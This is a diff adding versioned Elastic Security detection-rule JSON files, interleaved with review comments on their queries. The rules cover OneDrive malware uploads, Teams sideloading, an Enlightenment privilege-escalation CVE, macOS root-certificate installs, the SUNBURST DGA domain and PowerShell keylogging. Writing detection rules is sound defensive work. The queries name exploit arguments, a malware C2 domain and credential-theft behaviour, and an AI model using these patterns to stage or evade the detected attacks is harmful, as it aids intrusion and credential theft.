} + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + 
"id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json new file mode 100644 index 00000000000..23de05621cd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + 
"id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json new file mode 100644 index 00000000000..06185193e59 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly 
structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 104 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json new file mode 100644 index 00000000000..a67be068eb3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json 
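Review bot: The MITRE mapping in the `threat` block lists tactic TA0003 with `"technique": []`, and `note` is empty, so the rule carries neither a technique reference nor any triage guidance; the identical _106 and _207 versions added below share both gaps. If no ATT&CK technique fits this tenant-setting change, a short sentence in `note` saying so would keep the empty array from reading as an omission. The query also keys on the display string `o365.audit.Name:"Allow sideloading and interaction of custom apps"`, which is presumably the setting name as Microsoft renders it in the audit record; a rename on their side would silently stop the rule firing, which is worth recording in `note` so that a drop to zero alerts is investigated rather than read as quiet.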
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly 
structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json new file mode 100644 index 00000000000..6073dc1d7aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly 
structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 207 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json b/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json new file mode 100644 index 00000000000..0049725f6ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation CVE-2022-37706 via a flaw in Linux window manager package Enlightenment. enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Enlightenment", + "query": "sequence by host.id, process.parent.entity_id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"enlightenment_sys\" and process.args in (\"/bin/mount/\", \"-o\",\"noexec\",\"nosuid\",\"nodev\",\"uid=*\") ]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and user.id == \"0\"]\n", + "references": [ + "https://ubuntu.com/security/CVE-2022-37706", + "https://www.exploit-db.com/exploits/51180" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bc0fc359-68db-421e-a435-348ced7a7f92", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic 
Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "bc0fc359-68db-421e-a435-348ced7a7f92_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json new file mode 100644 index 00000000000..bb1b36cfffa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json 
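Review bot: In the first sequence stage of `query`, `process.args in ("/bin/mount/", "-o","noexec","nosuid","nodev","uid=*")` uses EQL `in`, which as far as I know is exact term membership without wildcard expansion, so `"uid=*"` only matches an argument that is literally that text, and the clause is satisfied when any single argument equals any listed value rather than when the argument set as a whole is present. The `uid_change` to `user.id == "0"` in the second stage keeps the sequence from being pure noise, but the first stage is looser than the description implies; if the `uid=` argument is meant to be required, `process.args like "uid=*"` alongside `process.name == "enlightenment_sys"` would express that. The `setup` text also has a triple newline after `## Setup` and links the pinned `fleet/8.10/agent-policy.html` guide where the sibling bc1eeacf rule links `fleet/current`; both look like upstream generation artifacts to fix at the source.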
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to their command and control servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Install Root Certificate", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\" and\n not process.parent.executable:(\"/Library/Bitdefender/AVP/product/bin/BDCoreIssues\" or \"/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp\"\n)\n", + "references": [ + "https://ss64.com/osx/security-cert.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bc1eeacf-2972-434f-b782-3a532b100d67", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is 
integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "bc1eeacf-2972-434f-b782-3a532b100d67_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json new file mode 100644 index 00000000000..a02aff91063 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json 
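Review bot: The exclusion in `query` allow-lists two Bitdefender parents purely by `process.parent.executable` path, so anything that can launch `security add-trusted-cert` from a binary placed at either path inherits the exception. On macOS those locations normally require root to write, which limits the exposure, but pairing the path with a code-signature condition on the parent (ECS has `process.parent.code_signature.trusted` and `process.parent.code_signature.subject_name`, if the Elastic Defend event populates them) would make the exception harder to reuse. The `note` field is also empty for a rule whose true positives mean a new trust anchor on the host; a pointer to checking the certificate subject and which keychain it was added to would help the analyst.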
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected DGA activity using a known SUNBURST DNS domain", + "query": "ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.registered_domain", + "type": "keyword" + }, + { + "ecs": false, + "name": "ml_is_dga.malicious_prediction", + "type": "unknown" + } + ], + "risk_score": 99, + "rule_id": "bcaa15ce-2d41-44d7-a322-918f9db77766", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. 
\n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. 
This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n``` \n", + "severity": "critical", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + 
"version": 3 + }, + "id": "bcaa15ce-2d41-44d7-a322-918f9db77766_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json new file mode 100644 index 00000000000..262360794f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json 
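Review bot: `required_fields` declares `ml_is_dga.malicious_prediction` with `"type": "unknown"`, while the component-template JSON quoted in `setup` maps the same field as `"type": "long"`; one of the two should change so the rule metadata matches the mapping it tells users to install. The `setup` text also names the pipeline as `-ml_dga_ingest_pipeline`, which looks like a lost prefix (likely `<version>-ml_dga_ingest_pipeline`) and is worth confirming against the DGA package. The description's "that used by the SUNBURST malware" should read "that was used by". Because `query` requires both `ml_is_dga.malicious_prediction:1` and `dns.question.registered_domain:avsvmcloud.com`, a DNS question for that domain without the ML enrichment will not alert; this seems intended given the rule name, but the rule has no `note` field at all, and stating that dependency there would save an analyst from assuming the domain alone triggers it.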
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Keylogging Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other valuable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
